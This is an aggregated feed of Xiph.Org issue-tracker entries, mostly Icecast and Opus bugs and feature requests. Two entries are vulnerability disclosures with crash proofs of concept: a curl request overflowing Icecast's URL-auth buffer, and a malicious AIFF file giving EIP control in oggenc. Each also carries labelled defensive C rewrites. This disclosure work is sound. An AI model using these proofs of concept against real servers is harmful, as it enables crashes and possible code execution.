Xiph.Org issues (https://gitlab.xiph.org/groups/xiph/-/issues), feed updated 2020-10-02T13:37:21Z

# Add API endpoint to set a mark in the log files
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2343
Updated: 2020-10-02T13:37:21Z
Author: Philipp Schafft

This is for debugging. The endpoint would write a marker into the log file. This can be helpful to find things in busy log files more easily.
The marker could optionally include a user-provided string and the username+role of the user who requested the mark.

# Security vulnerability: buffer overflow in URL authentication allows remote code execution
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2342
Updated: 2018-11-05T08:00:08Z
Author: Nick Rolfe

Hello,
I would like to report a security vulnerability in the Icecast server.
## The bug
`url_add_client` in `auth_url.c` contains this call inside a loop:
```c
post_offset += snprintf(post + post_offset,
                        sizeof(post) - post_offset,
                        "&%s%s=%s",
                        url->prefix_headers ? url->prefix_headers : "",
                        cur_header, header_valesc);
```
If the string to be written is longer than `sizeof(post) - post_offset`, `snprintf` will truncate the string, but will return *the number of bytes it would have written if the buffer were large enough*. This means that `post_offset` is incremented to be larger than `sizeof(post)`, and any subsequent iteration of the loop will write beyond the end of the buffer.
## Proof of concept
I configured a mount using URL authentication that forwards two headers:
```xml
<mount type="normal">
    <mount-name>/auth_url.ogg</mount-name>
    <authentication type="url">
        <option name="headers" value="x-foo,x-bar"/>
        ...
    </authentication>
</mount>
```
My Icecast server was running on localhost, port 8000, and then I ran the following Bash script:
```bash
foo=$(python -c "print('a' * 3950)")
bar=123456789123456789
curl -H "x-foo: $foo" -H "x-bar: $bar" http://localhost:8000/auth_url.ogg
```
The `x-foo` header was truncated, but it caused `post_offset` to be incremented beyond the size of the buffer, as described above. The subsequent handling of the `x-bar` header overwrote other stack contents, causing my Icecast server to crash:
```
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
```
By controlling the length of the `x-foo` header, and the contents of the `x-bar` header, it seems likely that remote code execution would be possible.
## Related bug
Our automated analysis highlighted this bug, and another similar misuse of `snprintf` in `format_prepare_headers` in `format.c`, but I did not investigate whether that one would be exploitable.
Those analysis results are visible here: https://lgtm.com/projects/g/xiph/Icecast-Server/alerts/?mode=tree&ruleFocus=1505913226124
## Disclosure
Please let me know when you have fixed the vulnerability, so that we can coordinate our disclosure with yours. For reference, here is a link to our vulnerability disclosure policy: https://lgtm.com/security
Thanks!
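The accounting bug in the report above, beside a bounded alternative, as an added example written for this page (it is not Icecast's code and not part of Nick Rolfe's report). `build_post_unsafe_offset` reproduces the offset arithmetic of the flawed loop but stops where the real loop would start writing past the buffer, and `build_post_safe` refuses to continue once a field fails to fit. `POST_SIZE`, the function names and the two constructed header values are assumptions made for the demonstration.

```c
/*
 * Added example (not Icecast code, not part of the report): the snprintf()
 * return-value pitfall described above, beside a bounded append that refuses
 * to continue once a field does not fit.  POST_SIZE, the function names and
 * the constructed header values are assumptions made for this demonstration.
 */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define POST_SIZE 64   /* deliberately small so the overrun is easy to see */

/*
 * Mirrors the flawed accounting: snprintf() returns the length it *wanted*
 * to write and that is added to post_offset whether or not it fit.  To stay
 * memory-safe this version stops as soon as the offset passes the end of the
 * buffer and returns it; the original loop would instead feed that offset
 * back into snprintf(), where sizeof(post) - post_offset wraps to a huge
 * size_t and the next field is written past the end of post[].
 */
size_t build_post_unsafe_offset(const char *const names[],
                                const char *const values[], size_t n)
{
    char post[POST_SIZE];
    size_t post_offset = 0;

    for (size_t i = 0; i < n; i++) {
        if (post_offset >= sizeof(post))
            break;                           /* the next call would overflow */
        post_offset += (size_t)snprintf(post + post_offset, sizeof(post) - post_offset,
                                        "&%s=%s", names[i], values[i]);
    }
    return post_offset;
}

/* Append one "&name=value" field.  The offset advances only when the whole
 * field fit; on truncation the partial field is erased and false returned. */
static bool append_field(char *buf, size_t bufsize, size_t *offset,
                         const char *name, const char *value)
{
    if (*offset >= bufsize)
        return false;
    int n = snprintf(buf + *offset, bufsize - *offset, "&%s=%s", name, value);
    if (n < 0 || (size_t)n >= bufsize - *offset) {
        buf[*offset] = '\0';
        return false;
    }
    *offset += (size_t)n;
    return true;
}

/* Hardened builder: true with the final length in *len, or false as soon as
 * any field would be truncated (the caller should then reject the request). */
bool build_post_safe(char *post, size_t post_size, const char *const names[],
                     const char *const values[], size_t n, size_t *len)
{
    size_t offset = 0;
    if (post_size == 0)
        return false;
    post[0] = '\0';
    for (size_t i = 0; i < n; i++)
        if (!append_field(post, post_size, &offset, names[i], values[i]))
            return false;
    *len = offset;
    return true;
}

/* Constructed inputs shaped like the PoC: an oversized x-foo, then a short x-bar. */
static const char *const demo_names[] = { "x-foo", "x-bar" };
static char long_foo[100];

static void init_long_foo(void)
{
    memset(long_foo, 'a', sizeof long_foo - 1);
    long_foo[sizeof long_foo - 1] = '\0';
}

/* Offset the flawed loop reaches after both headers: 106, past a 64-byte buffer. */
size_t demo_unsafe_offset(void)
{
    init_long_foo();
    const char *const values[] = { long_foo, "123456789123456789" };
    return build_post_unsafe_offset(demo_names, values, 2);
}

/* Safe builder: 0 when the oversized x-foo is rejected, the length otherwise. */
size_t demo_safe_len(bool oversized)
{
    char post[POST_SIZE];
    size_t len = 0;
    init_long_foo();
    const char *const values[] = { oversized ? long_foo : "abc", "123" };
    return build_post_safe(post, sizeof post, demo_names, values, 2, &len) ? len : 0;
}

int main(void)
{
    printf("unsafe offset after both headers: %zu (buffer is %d bytes)\n",
           demo_unsafe_offset(), POST_SIZE);
    printf("safe builder, oversized x-foo: %zu\n", demo_safe_len(true));
    printf("safe builder, short x-foo: %zu\n", demo_safe_len(false));
    return 0;
}
```

The unsafe offset comes out at 106 against a 64-byte buffer, which is exactly the state that hands a wrapped size to the next `snprintf()`. The fix is the check after every `snprintf()` call: a return value that is negative or not smaller than the remaining space means truncation, and the only safe response is to fail the request, never to keep appending.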
--Nick Rolfe, Semmle Security Research Team

Assignee: Thomas B. Rücker

# Library init/deinit functions
https://gitlab.xiph.org/xiph/icecast-common/-/issues/4
Updated: 2018-11-05T07:57:12Z
Author: Philipp Schafft

Functions should be added to init/deinit the library.
Those functions should work in a reference-counter way (maybe even using refobject) to allow the library to be used by multiple parts of the same process.

Assignee: Philipp Schafft

# Move all public headers into one directory
https://gitlab.xiph.org/xiph/icecast-common/-/issues/3
Updated: 2018-10-28T09:45:16Z
Author: Philipp Schafft

Currently all *public* headers are in the corresponding subdirectories but end up in the same installation directory. All the headers should be moved into a central directory.

Assignee: Marvin Scholz

# Assert in celt_decoder when custom modes are disabled
https://gitlab.xiph.org/xiph/opus/-/issues/2316
Updated: 2018-10-12T10:17:30Z
Author: Philippe Normand

I can't reproduce this issue outside of WebKit unfortunately. With a libopus built with `--enable-custom-modes=no`, open a YouTube video (make sure the MediaSource WebKit web setting is turned on).
```
Fatal (internal) error in /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/celt/celt_decoder.c, line 118: assertion failed: st->mode == opus_custom_mode_create(48000, 960, NULL)
(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007f54bd4e82f1 in __GI_abort () at abort.c:79
#2 0x00007f545143e81f in celt_fatal () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/celt/arch.h:76
#3 0x00007f5451446a65 in validate_celt_decoder () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/celt/celt_decoder.c:118
#4 0x00007f5451446b84 in celt_decode_with_ec () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/celt/celt_decoder.c:867
#5 0x00007f545146d7bf in opus_decode_frame () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/src/opus_decoder.c:518
#6 0x00007f545146eb16 in opus_decode_native () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/src/opus_decoder.c:721
#7 0x00007f545147810a in opus_multistream_decode_native () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/src/opus_multistream_decoder.c:253
#8 0x00007f54514784b9 in opus_multistream_decode () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/src/opus_multistream_decoder.c:398
#9 0x00007f545275c134 in opus_dec_chain_parse_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/ext/opus/gstopusdec.c:630
#10 0x00007f545275d5b3 in gst_opus_dec_handle_frame () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/ext/opus/gstopusdec.c:908
#11 0x00007f54bf915dc9 in gst_audio_decoder_push_buffers () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/gst-libs/gst/audio/gstaudiodecoder.c:1540
#12 0x00007f54bf91615b in gst_audio_decoder_chain_forward () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/gst-libs/gst/audio/gstaudiodecoder.c:1654
#13 0x00007f54bf917377 in gst_audio_decoder_chain () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/gst-libs/gst/audio/gstaudiodecoder.c:1914
#14 0x00007f54bfa0daba in gst_pad_chain_data_unchecked () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4322
#15 gst_pad_push_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4578
#16 0x00007f54bfa15c32 in gst_pad_push () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4697
#17 0x00007f54bfa0daba in gst_pad_chain_data_unchecked () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4322
#18 gst_pad_push_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4578
#19 0x00007f54bfa15c32 in gst_pad_push () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4697
#20 0x00007f54bf9fbcbb in gst_proxy_pad_chain_default () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstghostpad.c:127
#21 0x00007f54bfa0daba in gst_pad_chain_data_unchecked () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4322
#22 gst_pad_push_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4578
#23 0x00007f54bfa15c32 in gst_pad_push () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4697
#24 0x00007f54bf9fbcbb in gst_proxy_pad_chain_default () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstghostpad.c:127
#25 0x00007f54c69d892b in webkitMediaSrcChain(_GstPad*, _GstObject*, _GstBuffer*) () from /home/phil/WebKit/WebKitBuild/Release/lib/libwebkit2gtk-4.0.so.37
#26 0x00007f54bfa0daba in gst_pad_chain_data_unchecked () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4322
#27 gst_pad_push_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4578
#28 0x00007f54bfa15c32 in gst_pad_push () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4697
#29 0x00007f54bfb13485 in gst_base_src_loop () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/libs/gst/base/gstbasesrc.c:2957
#30 0x00007f54bfa41cb1 in gst_task_func () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gsttask.c:332
#31 0x00007f54beb78933 in g_thread_pool_thread_proxy () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/glib-2.54.2/glib/gthreadpool.c:307
#32 0x00007f54beb77fd5 in g_thread_proxy () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/glib-2.54.2/glib/gthread.c:784
#33 0x00007f54c06edf2a in start_thread (arg=0x7f54537fe700) at pthread_create.c:463
#34 0x00007f54bd5a8edf in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
```
I don't understand this assert; pointer comparison doesn't make much sense to me in this context.

# Namespace assignment
https://gitlab.xiph.org/xiph/icecast-common/-/issues/2
Updated: 2018-10-12T08:50:38Z
Author: Philipp Schafft

This subproject should be assigned a namespace for exported symbols and constants. This is closely related to #1.

# common/ should be converted into a library on its own
https://gitlab.xiph.org/xiph/icecast-common/-/issues/1
Updated: 2022-04-22T08:52:33Z
Author: Philipp Schafft

This subproject is currently included as external submodules via VCS. However, it is more generally useful and has a complex build system as it is currently. Therefore this should be converted into a real library.

Milestone: First release as libigloo
Assignee: Marvin Scholz

# authentication subsystem should allow the user to send a custom error
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2340
Updated: 2018-10-16T06:39:31Z
Author: Philipp Schafft

The authentication subsystem should be able to send a custom error in case of a negative match (deny).
The error to return should be selected by its report XML UUID.
Example config would look like this:
```xml
<authentication>
    <role type="anonymous" deny-all="*" reject-with="f955b6c6-aaca-4734-aacc-67d86bf83c3b" />
</authentication>
```
This would also be in line with `AUTH_ALTER_SEND_ERROR`.

Assignee: Philipp Schafft

# Build fails with LibreSSL: ./.libs/libopusurl.so: undefined reference to `BIO_meth_set_puts'
https://gitlab.xiph.org/xiph/opusfile/-/issues/2327
Updated: 2020-06-24T22:38:20Z
Author: Stefan Strogin

LibreSSL 2.6.5, Gentoo Linux.
```
src/http.c: In function ‘op_bio_retry_new’:
src/http.c:1540:3: warning: implicit declaration of function ‘BIO_set_init’; did you mean ‘BIO_sock_init’? [-Wimplicit-function-declaration]
BIO_set_init(_b,1);
^~~~~~~~~~~~
BIO_sock_init
src/http.c:1544:3: warning: implicit declaration of function ‘BIO_set_data’; did you mean ‘BIO_set_ex_data’? [-Wimplicit-function-declaration]
BIO_set_data(_b,NULL);
^~~~~~~~~~~~
BIO_set_ex_data
```
and so on.
Full [build.log](/uploads/e3c105fc852d754257bce86f654210a4/build.log)
See also: https://bugs.gentoo.org/588768

# Minor Issue on libopus 1.3-rc default framesize adjustment
https://gitlab.xiph.org/xiph/opus/-/issues/2315
Updated: 2020-04-22T04:19:26Z
Author: Heman Busschots

Hi,
I couldn't post on the IRC for some reason, so I want to post it here.
On the libopus 1.3-rc (release candidate), I found it best to change the Framesize setting to 40.
In my case I could increase bitrate from 48kbps to 51kbps, where artifacts are hardly heard, while keeping the same file size.
These 3 extra bits may seem little, but they're the difference between noticeable artifacts at 48kbps (in the stereo spectrum) and nearly fully transparent at 51kbps, all the while keeping the same file size.
Audio quality overall improved slightly thanks to this setting.
Setting it larger or smaller did not increase quality or decrease file size.
With that I just want to say that in my opinion the newer release candidate runs better with Framesize 40.
It would be nice to further be able to fine-tune this (in the range of 20-60) to see where the exact best setting is located.
The best framesize setting could be 30, or it could be 45; without the ability to tune it to anything other than 20, 40, or 60, I wouldn't know...
Not sure if Opus can support such a feature?
Just like CPU complexity is by default set to 10, I think framesize should be set to 40 by default on the release candidate (1.3).
Aside from allowing a 6% higher bitrate while keeping the same file size, it also allows for going much lower in bitrate before capping off the high frequencies.
For instance, for stereo music I can go as low as 24kbps at almost 48kHz (I think it's capped to 32, but it's mostly inaudible); and for mono I can go as low as 12kbps before the high frequencies are cut.
Using Framebuffer 20 or 60 has higher thresholds.

# After logrotate Icecast not using new access.log and error.log files
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2339
Updated: 2018-09-28T13:24:06Z
Author: Doug Tinklenberg

The logrotate postrotate command for Icecast is this:
```sh
/bin/kill -HUP `cat /var/run/icecast/icecast.pid 2>/dev/null` 2> /dev/null || true
```
The Icecast installation doesn't create the icecast folder in /var/run so there is no icecast.pid file.
So what's happening is that after a logrotate the Icecast service continues to use the access.log-date file rather than the new access.log file that is created during the logrotate. The only way to get it to use the new log files is to restart the icecast service.
Why is the logrotate command trying to kill a pid file that doesn't exist, and is there another postrotate command that should be used instead?

# SSL support on Ubuntu 18.04
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2338
Updated: 2019-01-26T10:42:02Z
Author: Simon Cechacek

Hello,
I am trying to run Icecast on my Ubuntu 18.04 with SSL enabled. When I add the official repository to the system and then use `apt-get install icecast2`, everything works except that when I turn SSL on, I get the `INFO connection/get_ssl_certificate No SSL capability` message. I pre-installed OpenSSL before the icecast installation.
Any idea how to fix this?
I also tried to build Icecast from source with the custom OpenSSL path parameter enabled (just put the default openssl path there) and it worked, but this icecast is installed as an app and not as a service, so I don't know how to reload the config without dropping listeners (I need to add relays without restarting the server, as it will serve as a proxy).
Thanks for all your time!

# RFE: Please add a possibility for a relay to transcode the stream
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2337
Updated: 2020-11-09T19:35:07Z
Author: petr tomasek

With Icecast I'm missing the possibility to create transcoding relays in a simple manner. I'd suggest there could be a new configuration option which would specify a binary/script which the stream would go through.
Something like this:
```xml
<relay>
    <server>127.0.0.1</server>
    <port>8001</port>
    <mount>/example.ogg</mount>
    <local-mount>/different.ogg</local-mount>
    <on-demand>1</on-demand>
    <retry-delay>30</retry-delay>
    <relay-shoutcast-metadata>0</relay-shoutcast-metadata>
    <transcode-bin>/usr/local/bin/transcodestreamXYZ</transcode-bin>
</relay>
```
Thanks!

# Icecast 2.5.x relays not working
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2336
Updated: 2018-07-26T10:19:39Z
Author: Philipp Schafft

Relays do not work.
In master since 4a10d7e74422b7c3a31d4677e12f5aa3ce52474f.
`client->request_body_length` is not correctly set up, leading to a body read limit (`client->request_body_length=0`). The client generally may not be in the correct state.

Assignee: Philipp Schafft

# libshout does hang in shout_open().
https://gitlab.xiph.org/xiph/icecast-libshout/-/issues/2301
Updated: 2019-05-14T16:44:28Z
Author: Philipp Schafft

libshout in 062373684bdeedf72d5432b0d247f459cb7fc285 hangs in calls to shout_open() in some cases.
In state `SHOUT_STATE_RESP_PENDING` it passes retry via `(rc == SHOUTERR_SOCKET && self->retry)`. `self->retry` does not reach 0.
libshout is in blocking mode with TLS in RFC2818 mode. Server is Icecast 2.4.1. The reply in question is 401 to a probe request. The non-probe request is sent but the socket is closed by the server.
Maybe related to HTTP keep-alive.

Assignee: Philipp Schafft

# `<no-mount>` (`<mount>`'s child) is a noop in 2.5.x
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2335
Updated: 2021-04-14T10:51:43Z
Author: Philipp Schafft

The tag `<no-mount>` (which is a child element of `<mount>`) doesn't seem to do anything in 2.5.x. However, according to a source code comment it should disallow direct access to the mount.
This may interact with the ACL system.

Assignee: Philipp Schafft

# Change playlist_new default from 4 to 10
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2332
Updated: 2018-07-09T11:30:46Z
Author: Roger Hågensen

Change `src->history = playlist_new(4 /* DOCUMENT: default is max_tracks=4. */);`
To `src->history = playlist_new(10 /* DOCUMENT: default is max_tracks=10. */);`
Other servers like Shoutcast have 10, and various players and web players have 10.
Most service providers do minimal configuration changes, so a default of 10 is beneficial as that is most likely what users want anyway.

# Add history to status-json.xsl
https://gitlab.xiph.org/xiph/icecast-server/-/issues/2331
Updated: 2018-07-07T19:19:02Z
Author: Roger Hågensen

Since history is now implemented in https://gitlab.xiph.org/xiph/icecast-server/commit/3dd8bdbf40e0988d331724f2a2b5c2bf774584b4 it is hopefully trivial to add this to status-json.xsl as well?

# ices2.0.2 example config missing `<yp>`
https://gitlab.xiph.org/xiph/icecast-ices/-/issues/2321
Updated: 2018-10-09T21:06:17Z
Author: Waitman Gobble

It would be helpful to have the `<yp>` option and a comment in the conf/ices-playlist.xml example which ships with 2.0.2.
thanks.

Assignee: Thomas B. Rücker

# Uncontrolled alloca() in oggenc which may lead to a remote code execution in 32-bit environment
https://gitlab.xiph.org/xiph/vorbis-tools/-/issues/2322
Updated: 2018-09-17T19:57:06Z
Author: Jaeseung Choi

During fuzz testing, I found a program-crashing bug in the latest version of `oggenc`. When a malicious AIFF audio file is provided as input, a segmentation fault or remote code execution may occur.
I downloaded the http://downloads.xiph.org/releases/vorbis/vorbis-tools-1.4.0.tar.gz file, and compiled it with clang 3.8.
In the `aiff_open()` function of the `oggenc/audio.c` file, the size argument of the alloca() call is not checked tightly, and therefore a large amount of memory can be requested.
```c
    if(!find_aiff_chunk(in, "COMM", &len))
    {
        fprintf(stderr, _("Warning: No common chunk found in AIFF file\n"));
        return 0; /* EOF before COMM chunk */
    }

    if(len < 18)
    {
        fprintf(stderr, _("Warning: Truncated common chunk in AIFF header\n"));
        return 0; /* Weird common chunk */
    }

    buffer = alloca(len); /* len comes straight from the file; only its lower bound is checked */

    if(fread(buffer,1,len,in) < len)
    {
        fprintf(stderr, _("Warning: Unexpected EOF in reading AIFF header\n"));
        return 0;
    }
```
In a 64-bit environment, this will simply make the program crash, but in a 32-bit environment this bug can lead to remote code execution. If a malicious attacker requests a large amount of memory (e.g. alloca(0xffffff00)), this will **lift up** the stack pointer (%esp register) instead of correctly allocating a stack buffer. Then, the subsequent fread() call will overwrite the stack and corrupt the saved return address.
I attach the PoC input file to reproduce this bug.
[poc](/uploads/ab90d639d90d2fca08ddbb6e787f8522/poc)
```
jason@debian-stretch:~/ground/vorbis-tools-1.4.0$ gdb oggenc/oggenc -q
Reading symbols from oggenc/oggenc...done.
(gdb) run ~/poc
Starting program: /home/jason/ground/vorbis-tools-1.4.0/oggenc/oggenc ~/poc
Warning: Unexpected EOF in reading AIFF header
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg $eip
eip 0x41414141 0x41414141
```
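A bounded replacement for the COMM-chunk read, as an added example written for this page (it is not vorbis-tools code and not part of the report above). It parses a minimal in-memory AIFF and validates the chunk length against a fixed buffer and against the bytes actually present before copying anything, which is the check that `alloca(len)` followed by `fread()` lacks. `read_comm_chunk`, `check_file`, `COMM_MAX` and the constructed sample files are assumptions made for the demonstration.

```c
/*
 * Added example (not vorbis-tools code): a bounded replacement for the
 * COMM-chunk read above.  Every length taken from the file is checked against
 * a fixed buffer and against the bytes really present before any copy, which
 * is the check alloca(len) + fread() lacks.  read_comm_chunk, build_aiff,
 * check_file, COMM_MAX and the sample files are assumptions for this demo.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define COMM_MIN 18     /* the lower bound the original code does check */
#define COMM_MAX 4096   /* assumed upper bound; real COMM chunks are tens of bytes */

typedef enum { COMM_OK, COMM_NOT_AIFF, COMM_NOT_FOUND, COMM_SHORT,
               COMM_TOO_LARGE, COMM_TRUNCATED } comm_status;

static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static void put_be32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}

/* Locate the COMM chunk and copy its payload into a caller-owned COMM_MAX
 * buffer.  Nothing is copied until the claimed length has been validated. */
comm_status read_comm_chunk(const unsigned char *data, size_t size,
                            unsigned char *out, uint32_t *out_len)
{
    if (size < 12 || memcmp(data, "FORM", 4) != 0 || memcmp(data + 8, "AIFF", 4) != 0)
        return COMM_NOT_AIFF;

    size_t pos = 12;                              /* first chunk header */
    while (size - pos >= 8) {
        uint32_t len = be32(data + pos + 4);
        size_t avail = size - (pos + 8);          /* payload bytes really present */

        if (memcmp(data + pos, "COMM", 4) == 0) {
            if (len < COMM_MIN) return COMM_SHORT;       /* the check the original has */
            if (len > COMM_MAX) return COMM_TOO_LARGE;   /* the check it lacks */
            if (len > avail)    return COMM_TRUNCATED;   /* fread() would come up short */
            memcpy(out, data + pos + 8, len);
            *out_len = len;
            return COMM_OK;
        }
        /* Skip a non-COMM chunk (payload padded to even length) without letting
         * a hostile len push pos past the end of the buffer. */
        if (len > avail) return COMM_NOT_FOUND;
        size_t skip = (size_t)len + (len & 1u);
        if (skip > avail) return COMM_NOT_FOUND;
        pos += 8 + skip;
    }
    return COMM_NOT_FOUND;
}

/* Constructed sample file: FORM header plus one COMM chunk whose header claims
 * claimed_len bytes while only `present` payload bytes follow. */
static size_t build_aiff(unsigned char *buf, size_t cap, uint32_t claimed_len, size_t present)
{
    size_t total = 12 + 8 + present;
    if (total > cap) return 0;
    memcpy(buf, "FORM", 4);
    put_be32(buf + 4, (uint32_t)(total - 8));
    memcpy(buf + 8, "AIFF", 4);
    memcpy(buf + 12, "COMM", 4);
    put_be32(buf + 16, claimed_len);
    memset(buf + 20, 'A', present);
    return total;
}

uint32_t last_comm_len;   /* payload length of the last successful check_file() */

/* Build a sample file with the given COMM header and run it through the reader. */
comm_status check_file(uint32_t claimed_len, size_t present)
{
    unsigned char file[64], comm[COMM_MAX];
    size_t len = build_aiff(file, sizeof file, claimed_len, present);
    last_comm_len = 0;
    return read_comm_chunk(file, len, comm, &last_comm_len);
}

int main(void)
{
    /* 18/18 is an honest file; 0xffffff00 is the kind of length that lifts %esp
     * when handed to alloca() on 32-bit; 1000 is plausible but lies about the
     * bytes that follow. */
    printf("benign: status %d, len %u\n", check_file(18, 18), (unsigned)last_comm_len);
    printf("huge claim rejected: %d\n", check_file(0xffffff00u, 32) == COMM_TOO_LARGE);
    printf("lying length rejected: %d\n", check_file(1000, 32) == COMM_TRUNCATED);
    return 0;
}
```

The upper bound is the essential addition: with only `len < 18` checked, any 32-bit length from the file reaches `alloca()`, and the length need not even be large enough to wrap the stack pointer to do damage, since a merely oversized request still exhausts the stack. Checking the claimed length against the bytes actually present also turns the "unexpected EOF" path into a clean rejection before any stack memory is touched.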